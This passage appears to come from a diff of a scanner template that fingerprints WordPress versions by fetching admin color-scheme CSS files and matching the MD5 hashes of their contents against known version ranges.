+ - "(\"e475c1a0cd8fdfc4ded9551d5bed4ca5\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"ad984fa369ed10821d387cd909ea5649\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"e3bd414de7534790a8761e1767e0f072\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"4cb56002de1209c98e9ba405858cbbb4\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"5240a5d120f3de68f50aa14c42f42ebe\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"baddad393fd77ce3eded19a47f596189\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"2481535f18cae31b8be4ed6d233b4158\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/midnight/colors-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - 
"(\"58dae4b75a6f54d583e36870591fbc46\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"9527914dee63a89cf72473fb23bf063f\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"99ac5a3755ed5acd78360f589e880dcf\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"ff228ab4531174f9292c7d4689eea615\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"8018aa2ae5df17ae3ba3b88fe1818fd8\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7386ebd85ed17227277f38bf986ec649\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"27c54160898b88b4dd86baa0c0618d1a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"9e8cdcc5820931f3324339f6ec30bdcb\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"94457336df384eee6f64773fa914a609\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"e0541afbb33bc7389acc383dfdd91819\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"c4229460e28195d59dadc5927b591ef3\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"145d2df39b9a8604db59465b36b081b6\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"aecd603f94e7bbd2ef18fd360bb6652d\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"b57d5dd40e05c32a431749322009f234\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"52b7e848e2bb6607b4e714ce168d335e\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"3b1b999fc3b428d847eff0cc1008c21e\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"e12dc487d41f9eb74752df4e280e69f2\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"ac60e49d77c6b5245f56a5221d1fadf5\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"12e96ecc678c3dce24ea3ff7351b8767\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"9421a5f0d00af3d1205fd185c1cdf61b\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/css/colors/midnight/colors-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"ecb168ac881b1974386d6722018589df\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"6bbde2ec66d17f54b8ce67e0519310c8\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"45a1dc3597f440d818d7adaaec694a3d\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"c1724aa74b85565ad129608093d951a7\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"46d38df7939457add9e0cb01862625fd\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"bcbc1b8d22c46e76d9a39507376b81c5\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"ed5bc7004a118f6b9b4fddeb82d9d78a\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"01177358c121a44d888428eb66a3fdce\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"5f2622d75f92cd287dadd410b99aba43\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"949cb3874d4150bf45d54d02f108bc1d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"16de8dbce800ca3a800c5a27a85c9adb\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"faad862c1c60e1afe18e910b2a56f886\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"456fa1aacdc754b7e61e1b8e32411a15\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"3df2f7e94dc064133dce5ecca4a705d2\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"41dbb400a0c7f340a9c93ec5530fc138\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"73b50e985b5ddbe2afdf3e60fe3c91e9\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"13a62affb19421a576f61b45959ad2c8\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"ce815c6eedce1fe226862aa2465f7b07\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"ae10dfdf20966c5a31ab73f6045dfb36\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/css/colors/midnight/colors.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"ec678f19e1681ae3cfc6cc15d1b0a128\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"9757ca09dddfa5a983e2b25f826a96ca\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"fc8831d91e726e0f99730adde37e9175\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"29888360ce68d130f41ed391bd647ab3\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b048ef915d1fa35107bc54d96bdca463\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"229cd304fee2141d2b8ac2be3002fbdd\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"c09c501be59486f3a7ec42c322e929cc\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"05b8d5e2e09cb5ec16cb2991c857719c\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"22803a84f503c895cc540b01da3c8059\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"3c8eb91438052ad8ed3e5c407bb46871\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"a58fdad36db9fddd391c6960b8cff21c\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e03f63363d23a124c1940a6a9c657441\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"0c0eaf1b7049bacb2efcf7a5bd5b9669\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"10ea1bb4f8fb13aaa4aadf13744d4410\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"580dc16a24cd582e8afaee49d73dcf7e\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"3e5b7d16274bc2b3f7ee49a35652af36\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"95098be791e68f428e6a0b0f6cdae29b\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"b6940b5dad3790211178cde06f029e59\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"4909e03ca72e1fe17343df6135f57091\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/css/colors/coffee/colors.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"31f8a34795536919f4d903f31b2c2abf\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"2bd83c43aed60c175a0f8c5d2738639b\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"f032e42bc6cb2033bfde657c7494337e\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"dba131a88a68e7acbb7b3cec28db1dcb\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"46a337f2ec44eb87918c06bc84f82a55\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b4cd3218e3c6e52336a8da60cf847d4c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"594f599a5d8f91d07fc0f317117561a7\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"1e500dd63ae97e399dbd6cee43d72ec8\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"2208e58ad099a1ce01177a1a7e6f3190\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"0ad4b42efbdb5ad11a01ebb7dc75178a\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"059a5265a9a022fa492324fb90341055\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"263d280c18ac772f266f0985ae36973a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"aa969b60bb26bcbd12d6a33f9b831475\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"20d616b7596b9f004dbdee4875d60d85\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"dd7a1f669975f835a5463265fcbf228c\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"7e6bd22f6f3f59a6bb67cfb0a07724b5\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"fb9e5d2fa6a3a341c965a0df67cd5c20\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"4383fff6b3f7a39f54c8d4ea2e96fbf5\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"e8e158e8c1e00d330901a6c0551b640d\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - 
"(\"d344cf96de87c8ade83fd1680ee9fa21\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/coffee/colors-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"e990ccbcd406eb7639db1966040a4169\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"74dab612b62647eeac56102d9fded496\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"7a6adb6f93ebe47bb2a49bac118ffe24\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"6509268c1c5e84a108c0030e7f1e8eed\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"b8a702008f8b8b1a38b0a2ef37723c6e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"2272c3bc872bdcce77a6b8d0ec902701\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"4660617cfae6b1ec687fe800ea238cd5\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"2a31c90c6060eb8c9b696e90455d31d5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"d2b89a3e73c87b9c39794a4bf201dbb7\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"374ddd0bfada7b8e7e08c3ad75e719c6\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"e1f8d2bad643e1a93cc9f2d5908e60aa\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"f8fe8659b15b8e5ee7c5bfd9aa067b73\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f15d9c97b13b36e554fc800efe93b368\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"4bf44f2d95e5e446d85aeeffe626e135\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"b783d66f5de1122b846fccc7f2caace7\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"7c55de81d6e8396466061214d797db17\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"7229d3fc179243a547504368f3516128\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"68bc26788771128a9d2c94547a6cf568\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - 
"(\"fa7fa07fb1b4e8f58ec2a0a310171aa6\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"0f2dd46bb4fc24d6f3a8aef983cb90cc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ocean/colors.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"42686d5afca9aeb0ac4b04b6c35df0e7\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"3a51a395483d77757c9e1d236651417b\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"d04d8dba0a8390d11aafe4f5a03dc972\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"66a395bc778d300fc5f0b2d77daa1fbd\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"744e9c6c33a37d9db3ad2f57318efa09\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"58be4f65a594e084222693e8fba9867e\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"6882c09b189df57714ce0dbf7634d0b6\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"3b3f6318207f03b0ed86af7b1c4529a4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"02fc9e590e7423aba6c478c4782d07bd\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"c414758f69c13dff67ef7ce2b57350bf\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"7434d42be65938ef44ee3a474ccf72dd\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"df4944e91c7bbe26599df8827fc4b142\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"b4a5193ac0855c1ee4581034b950c5d3\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"114677d80b4276c22ccd8558a39e3399\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"81e903a56357b68812980d1e26dabd97\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"2ba44c4cfab37459e99c503bcfbe6549\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"4290f926950485af972020a1c2e17bdd\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - 
"(\"33af6a595d5d60440c80fa0acefde63c\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"08a72f44a7ba011db56013197d1e84c9\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"6a70ed7d062bd418c3ecc45126d9e047\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ocean/colors-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"3942519c51eac40a974afe4e692311a9\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"0d868fe77c55aa8086815541a5febdf5\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"f8b49360db7b06106c295535de575d1f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"6803f9cacd5c572ea07a6191c6b3a955\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"e6e9cf722d8de33ad8061c14181b9d02\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"83320550041b6ac4a3b224f8cd66a156\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"f3f1049fff65b59b6ee73c8324a06d6b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"8391fa695eb835e0e2c9058881359ac4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"df07ae9eb80c843ee9851cc07c745a6b\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"3b9137f812aa6cf6a5038fd0e8cbd68c\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"9a55f6f39ed642323724a678c9cfa4b5\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8bef0b039c5cc85393c4f82a39ebe1eb\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"8cfd80664f79160c558113bdc45f66f8\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"ac9b85a8997fad0424ed768c8b3a7fab\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"ddd584a26b38564d2bffe96173cc0fdb\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"5a07925c796f75ebb2481b73dbf50e28\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - 
"(\"0cf2e52c89e754af7315d139c676b42b\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"4618abb323cd6804dd9602b097eb01d5\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"c56df1affc4b4d719a6961d1ab11c67d\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"a19b01302b963beb183ae967896f4c1a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ocean/colors-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"e6c6ccbf9d3324987324ed2802a695de\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"124e45c18cfbd0d1c69dbb6e6cbcbd72\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"22dbd1fcd0396ec5d53b9ac70986ce4d\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"6aa2e9fb264e5c58d2a755d1b09cdad2\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"9b6c0b762c7c8c9edb0fdf22fd85084f\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"10aec0930bf49892f26ae12a2161d9f5\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"f8efb32e4c1bfdc779625bfab3ef29f5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"054be6e2d37a4035c4f1f2fac9ca6071\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"6d2aa9063ac3cd5e37c836d8e4e6ac1c\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"ff093ff18aef2de35d910e9bc7300a63\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"f26236f80294976fd03cd01ea7c119de\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"2045d8aca5c756472323069740e9d9ec\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"aa4bf2f4b402f8118a05f003f6b3ed10\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"0178835344242e30c4d31e3929ad8277\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"e28e04ceb70d5482bb78052f6185a4f3\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - 
"(\"3a9c2e1817bfe75b9f3ca3dc73727ec2\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"f01b1c814f1b4e0889587391222ce56f\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"84becdf4915595c2ee74a32b8c98d982\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"4ff67a17f525872e5810c7433ef3ecab\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ocean/colors.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"6def631dce1084cd5e47ec236997ac76\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"eb668f9051822ba6ba7d0730fc7c7ab5\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"4ed0de0e34ed26b0cba26e9845c4b6a3\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"9533bb981ce46f45ce5d8359112e400e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b020388806a04a345a11b54a667b0f0a\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"6e1c9ca18902b56c36af3e28246eeac7\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"5a9b0f003097c036cd9652b97ae58b5e\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"6d9237b9422cde63ae1b46d65e92c4ec\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"f6d59352fe85ef21f18a00b92507a1cf\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"30f1caf5ac1ca40c859539bbf81e439e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"eee72a2f2014c3d8f615a9284f5c5aac\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f73f4774e692b7fb4c9cadbe6d1cb18b\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"afa8cd3fc9d22defe9b2b195627e909a\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"f1511382ee737a33ca146addbd855607\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"f811888802876ed3ed6ca1b1f4f1dbab\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - 
"(\"b4efb3e7744d0a1e70748138da9e6804\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"04f9105a8b65245cf22080dca66382f8\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"6d1097917d04a4ac0aaa1bd08fa4943c\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"c17b036935ef47a816c90b5faa543c0e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/light/colors.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"3b42ed8f88b3504e85fa6c9bcffc7d68\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"b0a2e41cc8e4fc1d20b51923cc1412b6\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"85e47a254d85f992643bdc75f3f130bc\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"37b13af5b2d2fe92bda3ea34734fa727\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"e4022388c07ee804bd347f23e1662158\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"25e706f4ca9277b6f5c09ec85e8360ac\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"2297575ac6851b541ef9f8797d318ec2\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"347944869f261dbbbd1d39e466652be3\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"2bffe9b64cd0f84a079fc09708785026\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"3dc722ed8881be9e50c0889a8c6dcc70\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"2e105d8125f21fa58ebd346a11e9efcc\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"24ce38778beaf7899914f079cc6e1bd7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"a27f248d1478b01d1fbdaff924a9c9d9\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"d91432b5b30c8a375f88a2476fb83953\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"75aa2db229bd2da0e80af17e8b1eee7a\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - 
"(\"e1d733902309caf84b473f3d0ac2d846\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"367b273fcbf2e1018eef5046fd93149d\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"f5df1e2a1d7db3ee134cd4259e7f0f8e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"9976161dacac2691db0c1ab9d9f64928\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/light/colors-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"6f8cbadd7a62e47b10fd1fa31ade20bd\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"f60e0eb47f81bbc633a19b19e6cf6f7b\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"8753f151ad2a1db9d6a51f3825986c45\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"b4be2184e5b0187f52904e43be7cbb8e\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"47089b7b3f48af038d9731dcd450da3b\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"ca985fbb17060a4a54e0c2b9c9e4c54a\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"e3ceeb9466bd89ba5ee791130f9ca85f\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"9d2aa89b387842aab22c1403ada1ad30\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"74c24051404a9db46da1792f4f3eab02\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"d1d45cb5385dc3a0dda32b2339b660aa\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"f1ee0df10cdc3a4308768472cc3e8667\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"cfa4791d5201633ce396fea1d3c25218\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"cc5ba6eaf7d90ccab5fd1a705d0b57e7\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"34c7ecd41abb111fdd058dffd0de8751\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"7e659847f1761bde89f2090ff4675d49\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - 
"(\"7e9d6252fd84110298fc42e80f31c4b1\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"9396d21e0d8b5e06542871200176f303\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"2cf260411296203c7fce4e25140923db\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"cba6790eb8274eb25b2e3f15a77c519e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/light/colors-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"d12c6321c2905a72081e07d1f3696532\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"22a8f413fe68dd3e05d11127d089985e\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"1bdecd78f1ec3604f202995e0785e120\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"6e8c045bd416f95339a55569ea56af50\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 